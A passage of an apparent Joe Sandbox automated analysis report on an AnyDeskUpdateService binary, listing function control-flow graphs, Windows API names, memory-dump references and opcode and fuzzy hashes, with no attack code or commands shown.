SetServiceStatus 886->890 891 7ff71dd88390-7ff71dd8839c 887->891 889->890 893 7ff71dd88503-7ff71dd8851f call 7ff71dd976f0 889->893 890->893 891->891 895 7ff71dd8839e-7ff71dd883c6 call 7ff71dd8fcd0 call 7ff71dd885f0 891->895 895->893 903 7ff71dd883cc-7ff71dd883e2 895->903 904 7ff71dd883e4-7ff71dd883f7 903->904 905 7ff71dd883fd-7ff71dd88402 call 7ff71dd97710 903->905 904->905 906 7ff71dd88520-7ff71dd88525 call 7ff71dda4a78 904->906 905->893
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$ErrorLastStatus$CloseCreateHandle$CtrlEventFileHandlerManagerModuleNameOpenRegisterThread
                                                                                                      • String ID: %s$%s (%d)$%s (%d)$%s (%d)$AnyDesk Update Service$AnyDeskUpdateService$AnyDeskUpdateService$pslk
                                                                                                      • API String ID: 4101962034-53298800
                                                                                                      • Opcode ID: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction ID: 56602dd4475ae23148ff91bbf50fb94b35faab294628369486b938b662e7fc42
                                                                                                      • Opcode Fuzzy Hash: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction Fuzzy Hash: 7862E422E1CA8989E700AF78D4012BDB3B1FF457A8F904237DA98566A5FF3CD149CB50
                                                                                                      Function 00007FF71DDBAD68 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 978 7ff71ddbad68-7ff71ddbaddb call 7ff71ddba94c 981 7ff71ddbadf5-7ff71ddbadff call 7ff71ddb506c 978->981 982 7ff71ddbaddd-7ff71ddbade6 call 7ff71dda4ba4 978->982 988 7ff71ddbae01-7ff71ddbae18 call 7ff71dda4ba4 call 7ff71dda4bc4 981->988 989 7ff71ddbae1a-7ff71ddbae83 CreateFileW 981->989 987 7ff71ddbade9-7ff71ddbadf0 call 7ff71dda4bc4 982->987 1004 7ff71ddbb136-7ff71ddbb156 987->1004 988->987 990 7ff71ddbaf00-7ff71ddbaf0b GetFileType 989->990 991 7ff71ddbae85-7ff71ddbae8b 989->991 997 7ff71ddbaf5e-7ff71ddbaf65 990->997 998 7ff71ddbaf0d-7ff71ddbaf48 call 7ff71ddc0050 call 7ff71dda4b38 CloseHandle 990->998 994 7ff71ddbaecd-7ff71ddbaefb call 7ff71ddc0050 call 7ff71dda4b38 991->994 995 7ff71ddbae8d-7ff71ddbae91 991->995 994->987 995->994 1000 7ff71ddbae93-7ff71ddbaecb CreateFileW 995->1000 1001 7ff71ddbaf67-7ff71ddbaf6b 997->1001 1002 7ff71ddbaf6d-7ff71ddbaf70 997->1002 998->987 1020 7ff71ddbaf4e-7ff71ddbaf59 call 7ff71dda4bc4 998->1020 1000->990 1000->994 1007 7ff71ddbaf76-7ff71ddbafcb call 7ff71ddb4f84 1001->1007 1002->1007 1008 7ff71ddbaf72 1002->1008 1018 7ff71ddbafea-7ff71ddbb01b call 7ff71ddba6cc 1007->1018 1019 7ff71ddbafcd-7ff71ddbafd9 call 7ff71ddbab54 1007->1019 1008->1007 1027 7ff71ddbb021-7ff71ddbb063 1018->1027 1028 7ff71ddbb01d-7ff71ddbb01f 1018->1028 1019->1018 1029 7ff71ddbafdb 1019->1029 1020->987 1031 7ff71ddbb085-7ff71ddbb090 1027->1031 1032 7ff71ddbb065-7ff71ddbb069 1027->1032 1030 7ff71ddbafdd-7ff71ddbafe5 call 7ff71ddacca0 1028->1030 1029->1030 1030->1004 1034 7ff71ddbb096-7ff71ddbb09a 1031->1034 1035 7ff71ddbb134 1031->1035 1032->1031 1033 7ff71ddbb06b-7ff71ddbb080 1032->1033 1033->1031 1034->1035 1037 7ff71ddbb0a0-7ff71ddbb0e5 CloseHandle CreateFileW 1034->1037 1035->1004 1039 7ff71ddbb11a-7ff71ddbb12f 1037->1039 1040 7ff71ddbb0e7-7ff71ddbb115 call 7ff71ddc0050 call 7ff71dda4b38 call 7ff71ddb51ac 1037->1040 1039->1035 1040->1039
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction ID: d4fca14b252321b009f4aadd3a99124538b94fcfb2332eca79d4876ccc2730d6
                                                                                                      • Opcode Fuzzy Hash: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction Fuzzy Hash: C6C10432B28E4995EB10DF64C4902BD7761FB4ABA8F815236DA5E47394EF38E119C710
                                                                                                      Function 00007FF71DDAE95C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1336 7ff71ddae95c-7ff71ddae98c 1337 7ff71ddae9bf-7ff71ddae9c2 1336->1337 1338 7ff71ddae98e-7ff71ddae99e call 7ff71dda4bc4 call 7ff71dda4a58 1336->1338 1337->1338 1340 7ff71ddae9c4-7ff71ddae9c7 1337->1340 1347 7ff71ddae9a2-7ff71ddae9be 1338->1347 1340->1338 1342 7ff71ddae9c9-7ff71ddae9cf 1340->1342 1342->1338 1344 7ff71ddae9d1-7ff71ddae9d4 1342->1344 1344->1338 1346 7ff71ddae9d6-7ff71ddae9fd call 7ff71ddbd9dc * 2 1344->1346 1352 7ff71ddaea90-7ff71ddaea93 1346->1352 1353 7ff71ddaea03-7ff71ddaea06 1346->1353 1356 7ff71ddaea95-7ff71ddaea98 1352->1356 1357 7ff71ddaea9a 1352->1357 1354 7ff71ddaea9d-7ff71ddaeabc call 7ff71ddbd9dc 1353->1354 1355 7ff71ddaea0c-7ff71ddaea1d call 7ff71ddbd9dc 1353->1355 1363 7ff71ddaeae9 1354->1363 1364 7ff71ddaeabe-7ff71ddaeaca call 7ff71ddaf474 1354->1364 1355->1354 1362 7ff71ddaea1f 1355->1362 1356->1354 1356->1357 1357->1354 1366 7ff71ddaea22-7ff71ddaea29 1362->1366 1365 7ff71ddaeaec-7ff71ddaeaf3 1363->1365 1373 7ff71ddaead0-7ff71ddaeadc call 7ff71ddaebac 1364->1373 1374 7ff71ddaeb8b 1364->1374 1365->1365 1368 7ff71ddaeaf5-7ff71ddaeb09 call 7ff71ddab160 1365->1368 1366->1366 1369 7ff71ddaea2b-7ff71ddaea42 call 7ff71ddab160 1366->1369 1378 7ff71ddaeb0f-7ff71ddaeb20 call 7ff71dda9a04 1368->1378 1379 7ff71ddaeb0b-7ff71ddaeb0d 1368->1379 1380 7ff71ddaea53-7ff71ddaea67 call 7ff71dda9a04 1369->1380 1381 7ff71ddaea44-7ff71ddaea4e call 7ff71ddab1d8 1369->1381 1383 7ff71ddaeae1-7ff71ddaeae4 1373->1383 1382 7ff71ddaeb93 1374->1382 1378->1382 1395 7ff71ddaeb22-7ff71ddaeb2e call 7ff71dda4bc4 1378->1395 1384 7ff71ddaeb86 call 7ff71ddab1d8 1379->1384 1388 7ff71ddaeb95-7ff71ddaebab call 7ff71dda4aa8 1380->1388 1396 7ff71ddaea6d-7ff71ddaea7d call 7ff71ddb98d4 1380->1396 1381->1347 1382->1388 1383->1374 1384->1374 1402 7ff71ddaeb31-7ff71ddaeb44 call 7ff71dda9a04 1395->1402 1396->1388 1401 7ff71ddaea83-7ff71ddaea8e call 7ff71ddab1d8 1396->1401 1401->1354 1402->1382 1407 7ff71ddaeb46-7ff71ddaeb52 call 7ff71ddaf474 1402->1407 1410 7ff71ddaeb66-7ff71ddaeb80 call 7ff71dda4bc4 call 7ff71ddaebac 1407->1410 1411 7ff71ddaeb54-7ff71ddaeb62 1407->1411 1414 7ff71ddaeb83 1410->1414 1411->1402 1412 7ff71ddaeb64 1411->1412 1412->1414 1414->1384
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDAE999
                                                                                                        • Part of subcall function 00007FF71DDA9A04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDA9A29
                                                                                                        • Part of subcall function 00007FF71DDB98D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDB98FC
                                                                                                        • Part of subcall function 00007FF71DDAB1D8: HeapFree.KERNEL32 ref: 00007FF71DDAB1EE
                                                                                                        • Part of subcall function 00007FF71DDAB1D8: GetLastError.KERNEL32 ref: 00007FF71DDAB1F8
                                                                                                        • Part of subcall function 00007FF71DDAEBAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDAEBEA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ErrorFreeHeapLast
                                                                                                      • String ID: .com
                                                                                                      • API String ID: 3231943733-4200470757
                                                                                                      • Opcode ID: 285768c466a6b3df03c4c0973ef54bcda0a58e502a2d52bb56038eee2e94fb96
                                                                                                      • Instruction ID: 117ce214470990ad347971f872275945cbca7d338e38b0ece4e91c15de467e54
                                                                                                      • Opcode Fuzzy Hash: 285768c466a6b3df03c4c0973ef54bcda0a58e502a2d52bb56038eee2e94fb96
                                                                                                      • Instruction Fuzzy Hash: E4518411B0DA4A45FA64BA2298112B9A681AF44FF0FC98537DD9E477D2FD3CF4098B20
                                                                                                      Function 00007FF71DDAEBAC Relevance: 16.7, APIs: 11, Instructions: 163synchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 911 7ff71ddaebac-7ff71ddaebdd 912 7ff71ddaebdf-7ff71ddaebf3 call 7ff71dda4bc4 call 7ff71dda4a58 911->912 913 7ff71ddaebf8-7ff71ddaebfb 911->913 927 7ff71ddaede2-7ff71ddaedfe 912->927 913->912 915 7ff71ddaebfd-7ff71ddaec01 913->915 917 7ff71ddaec03-7ff71ddaec0b call 7ff71dda4ba4 915->917 918 7ff71ddaec0d-7ff71ddaec2e call 7ff71ddb9c38 915->918 917->912 925 7ff71ddaec30-7ff71ddaec49 call 7ff71ddab1d8 * 2 918->925 926 7ff71ddaec4e-7ff71ddaec69 call 7ff71ddaf004 918->926 925->927 933 7ff71ddaec7a-7ff71ddaecfb call 7ff71dda4ba4 call 7ff71ddbe320 call 7ff71ddb9d9c 926->933 934 7ff71ddaec6b-7ff71ddaec78 call 7ff71ddab1d8 926->934 944 7ff71ddaed52-7ff71ddaed62 call 7ff71ddc0050 call 7ff71dda4b38 933->944 945 7ff71ddaecfd-7ff71ddaed01 933->945 934->925 970 7ff71ddaed64-7ff71ddaed67 CloseHandle 944->970 971 7ff71ddaed6d-7ff71ddaed70 944->971 946 7ff71ddaedff-7ff71ddaee07 call 7ff71dd9d434 945->946 947 7ff71ddaed07-7ff71ddaed0a 945->947 950 7ff71ddaed84-7ff71ddaed88 947->950 951 7ff71ddaed0c-7ff71ddaed28 WaitForSingleObject GetExitCodeProcess 947->951 953 7ff71ddaed8a-7ff71ddaed8d 950->953 954 7ff71ddaedae-7ff71ddaedb1 950->954 951->944 956 7ff71ddaed2a-7ff71ddaed31 951->956 958 7ff71ddaed8f-7ff71ddaed92 CloseHandle 953->958 959 7ff71ddaed98-7ff71ddaed9b 953->959 962 7ff71ddaedb3-7ff71ddaedb6 CloseHandle 954->962 963 7ff71ddaedbc-7ff71ddaeddf call 7ff71ddab1d8 * 3 954->963 960 7ff71ddaed33-7ff71ddaed36 CloseHandle 956->960 961 7ff71ddaed3c-7ff71ddaed3f 956->961 958->959 965 7ff71ddaeda6-7ff71ddaeda9 959->965 966 7ff71ddaed9d-7ff71ddaeda0 CloseHandle 959->966 960->961 967 7ff71ddaed41-7ff71ddaed44 CloseHandle 961->967 968 7ff71ddaed4a-7ff71ddaed4d 961->968 962->963 963->927 965->934 966->965 967->968 968->934 970->971 971->934 972 7ff71ddaed76-7ff71ddaed7f CloseHandle 971->972 972->934
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2936579111-0
                                                                                                      • Opcode ID: bd42c7ecaa9f5b6cff4489de4fad8ec41595277462ff7ce3a88bd78bf3a93305
                                                                                                      • Instruction ID: 0306d22a1dc646d1fcd6ed21abca846a3036a7e9054ac2cb2156ea03d92f8e29
                                                                                                      • Opcode Fuzzy Hash: bd42c7ecaa9f5b6cff4489de4fad8ec41595277462ff7ce3a88bd78bf3a93305
                                                                                                      • Instruction Fuzzy Hash: 46616222B0DF0A85FB10BF61D4402BCA3A2AB45FB4F854536DD8E17785EE38E449CB60
                                                                                                      Function 00007FF71DDAB2D4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1047 7ff71ddab2d4-7ff71ddab326 1048 7ff71ddab417 1047->1048 1049 7ff71ddab32c-7ff71ddab32f 1047->1049 1050 7ff71ddab419-7ff71ddab435 1048->1050 1051 7ff71ddab331-7ff71ddab334 1049->1051 1052 7ff71ddab339-7ff71ddab33c 1049->1052 1051->1050 1053 7ff71ddab342-7ff71ddab351 1052->1053 1054 7ff71ddab3fc-7ff71ddab40f 1052->1054 1055 7ff71ddab361-7ff71ddab374 call 7ff71ddc0228 1053->1055 1056 7ff71ddab353-7ff71ddab356 1053->1056 1054->1048 1061 7ff71ddab37a-7ff71ddab380 1055->1061 1057 7ff71ddab456-7ff71ddab465 GetProcAddress 1056->1057 1058 7ff71ddab35c 1056->1058 1062 7ff71ddab3f5 1057->1062 1063 7ff71ddab467-7ff71ddab48e 1057->1063 1060 7ff71ddab3e8-7ff71ddab3ef 1058->1060 1060->1053 1060->1062 1064 7ff71ddab436-7ff71ddab44b 1061->1064 1065 7ff71ddab386-7ff71ddab38f call 7ff71ddc0050 1061->1065 1062->1054 1063->1050 1064->1057 1067 7ff71ddab44d-7ff71ddab450 call 7ff71ddc0220 1064->1067 1070 7ff71ddab391-7ff71ddab3a8 call 7ff71ddaa340 1065->1070 1071 7ff71ddab3d6-7ff71ddab3e0 1065->1071 1067->1057 1070->1071 1074 7ff71ddab3aa-7ff71ddab3be call 7ff71ddaa340 1070->1074 1071->1060 1074->1071 1077 7ff71ddab3c0-7ff71ddab3d4 call 7ff71ddc0228 1074->1077 1077->1064 1077->1071
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
                                                                                                      • Instruction ID: 1f4ae6a551318d141e96885d58c002e6f85b0105cc729c2eca18311eabd82fc2
                                                                                                      • Opcode Fuzzy Hash: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
                                                                                                      • Instruction Fuzzy Hash: 18411A21B1DE1642FA11EB16A850676A395BF05FB0FC68637DD8D47780FE3CE40A8B20
                                                                                                      Function 00007FF71DDAC85C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1080 7ff71ddac85c-7ff71ddac881 1081 7ff71ddacb4f 1080->1081 1082 7ff71ddac887-7ff71ddac88a 1080->1082 1083 7ff71ddacb51-7ff71ddacb61 1081->1083 1084 7ff71ddac8c3-7ff71ddac8ef 1082->1084 1085 7ff71ddac88c-7ff71ddac8be call 7ff71dda498c 1082->1085 1087 7ff71ddac8f1-7ff71ddac8f8 1084->1087 1088 7ff71ddac8fa-7ff71ddac900 1084->1088 1085->1083 1087->1085 1087->1088 1089 7ff71ddac902-7ff71ddac90b call 7ff71ddb1340 1088->1089 1090 7ff71ddac910-7ff71ddac925 call 7ff71ddb7ee4 1088->1090 1089->1090 1095 7ff71ddaca3f-7ff71ddaca48 1090->1095 1096 7ff71ddac92b-7ff71ddac934 1090->1096 1098 7ff71ddaca4a-7ff71ddaca50 1095->1098 1099 7ff71ddaca9c-7ff71ddacac1 WriteFile 1095->1099 1096->1095 1097 7ff71ddac93a-7ff71ddac93e 1096->1097 1102 7ff71ddac94f-7ff71ddac95a 1097->1102 1103 7ff71ddac940-7ff71ddac948 call 7ff71dda2bf0 1097->1103 1104 7ff71ddaca52-7ff71ddaca55 1098->1104 1105 7ff71ddaca88-7ff71ddaca95 call 7ff71ddac314 1098->1105 1100 7ff71ddacac3-7ff71ddacac9 call 7ff71ddc0050 1099->1100 1101 7ff71ddacacc 1099->1101 1100->1101 1108 7ff71ddacacf 1101->1108 1112 7ff71ddac96b-7ff71ddac980 call 7ff71ddc02e0 1102->1112 1113 7ff71ddac95c-7ff71ddac965 1102->1113 1103->1102 1110 7ff71ddaca74-7ff71ddaca86 call 7ff71ddac534 1104->1110 1111 7ff71ddaca57-7ff71ddaca5a 1104->1111 1114 7ff71ddaca9a 1105->1114 1116 7ff71ddacad4 1108->1116 1122 7ff71ddaca2c-7ff71ddaca33 1110->1122 1118 7ff71ddacae0-7ff71ddacaea 1111->1118 1119 7ff71ddaca60-7ff71ddaca72 call 7ff71ddac418 1111->1119 1132 7ff71ddac986-7ff71ddac98c 1112->1132 1133 7ff71ddaca38 1112->1133 1113->1095 1113->1112 1114->1122 1123 7ff71ddacad9 1116->1123 1125 7ff71ddacb48-7ff71ddacb4d 1118->1125 1126 7ff71ddacaec-7ff71ddacaf1 1118->1126 1119->1122 1122->1116 1123->1118 1125->1083 1130 7ff71ddacb1f-7ff71ddacb29 1126->1130 1131 7ff71ddacaf3-7ff71ddacaf6 1126->1131 1136 7ff71ddacb30-7ff71ddacb3f 1130->1136 1137 7ff71ddacb2b-7ff71ddacb2e 1130->1137 1138 7ff71ddacb0f-7ff71ddacb1a call 7ff71dda4b80 1131->1138 1139 7ff71ddacaf8-7ff71ddacb07 1131->1139 1134 7ff71ddac992-7ff71ddac995 1132->1134 1135 7ff71ddaca15-7ff71ddaca27 call 7ff71ddabe9c 1132->1135 1133->1095 1140 7ff71ddac9a0-7ff71ddac9ae 1134->1140 1141 7ff71ddac997-7ff71ddac99a 1134->1141 1135->1122 1136->1125 1137->1081 1137->1136 1138->1130 1139->1138 1145 7ff71ddac9b0 1140->1145 1146 7ff71ddaca0c-7ff71ddaca10 1140->1146 1141->1123 1141->1140 1147 7ff71ddac9b4-7ff71ddac9cb call 7ff71ddb812c 1145->1147 1146->1108 1150 7ff71ddaca03-7ff71ddaca09 call 7ff71ddc0050 1147->1150 1151 7ff71ddac9cd-7ff71ddac9d9 1147->1151 1150->1146 1152 7ff71ddac9f8-7ff71ddac9ff 1151->1152 1153 7ff71ddac9db-7ff71ddac9ed call 7ff71ddb812c 1151->1153 1152->1146 1157 7ff71ddaca01 1152->1157 1153->1150 1159 7ff71ddac9ef-7ff71ddac9f6 1153->1159 1157->1147 1159->1152
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: b6fc4f158a9e9c29caf92685fa59fc20505ba3f633a93bb908a21979db94a982
                                                                                                      • Instruction ID: 9d18aeffaa0142721c403345f62bbae0e3d3b8cf9cba9c4233cc22c7a792bb05
                                                                                                      • Opcode Fuzzy Hash: b6fc4f158a9e9c29caf92685fa59fc20505ba3f633a93bb908a21979db94a982
                                                                                                      • Instruction Fuzzy Hash: 7A91D826A1CE5945F760EF69944027CA7A0BB05FB8F948137DE8E57784EE3CE449CB20
                                                                                                      Function 00007FF71DD9D344 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction ID: 33768de9a17097765ee126ba057d9039428b93fa76b07b2234b07193e73c1cbb
                                                                                                      • Opcode Fuzzy Hash: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction Fuzzy Hash: EAD09E10F2CF1E86EA5C7F7458951B8D2166F49776F80183EC98F47397EE2EA40D8A60
                                                                                                      Function 00007FF71DD97B1C Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1418 7ff71dd97b1c-7ff71dd97b37 call 7ff71dd97cf0 1421 7ff71dd97c73-7ff71dd97c7d call 7ff71dd98430 1418->1421 1422 7ff71dd97b3d-7ff71dd97b55 call 7ff71dd97cb4 1418->1422 1427 7ff71dd97c7e-7ff71dd97c83 call 7ff71dd98430 1421->1427 1422->1427 1428 7ff71dd97b5b-7ff71dd97b5d 1422->1428 1432 7ff71dd97c88-7ff71dd97c8a call 7ff71dd9d480 1427->1432 1430 7ff71dd97b5f-7ff71dd97b7e call 7ff71dda7918 1428->1430 1431 7ff71dd97ba9-7ff71dd97bac 1428->1431 1439 7ff71dd97b80-7ff71dd97b85 1430->1439 1440 7ff71dd97b8a-7ff71dd97ba7 call 7ff71dda78d4 1430->1440 1434 7ff71dd97bb1-7ff71dd97bc4 call 7ff71dd97e50 call 7ff71dd98418 1431->1434 1438 7ff71dd97c8f-7ff71dd97ca9 call 7ff71dd9d434 call 7ff71dd98324 1432->1438 1449 7ff71dd97be4-7ff71dd97bf0 call 7ff71dd98420 1434->1449 1450 7ff71dd97bc6-7ff71dd97bd0 call 7ff71dd97db8 1434->1450 1463 7ff71dd97cad 1438->1463 1443 7ff71dd97c63-7ff71dd97c72 1439->1443 1440->1434 1459 7ff71dd97bf2-7ff71dd97bfc call 7ff71dd97db8 1449->1459 1460 7ff71dd97c06-7ff71dd97c23 call 7ff71dda787c call 7ff71dda7af0 call 7ff71dda7ae8 call 7ff71dd82840 1449->1460 1450->1449 1458 7ff71dd97bd2-7ff71dd97bde call 7ff71ddc03a0 1450->1458 1458->1449 1459->1460 1468 7ff71dd97bfe-7ff71dd97c01 call 7ff71dd9d440 1459->1468 1474 7ff71dd97c28-7ff71dd97c31 call 7ff71dd98580 1460->1474 1463->1463 1468->1460 1474->1432 1477 7ff71dd97c33-7ff71dd97c36 1474->1477 1478 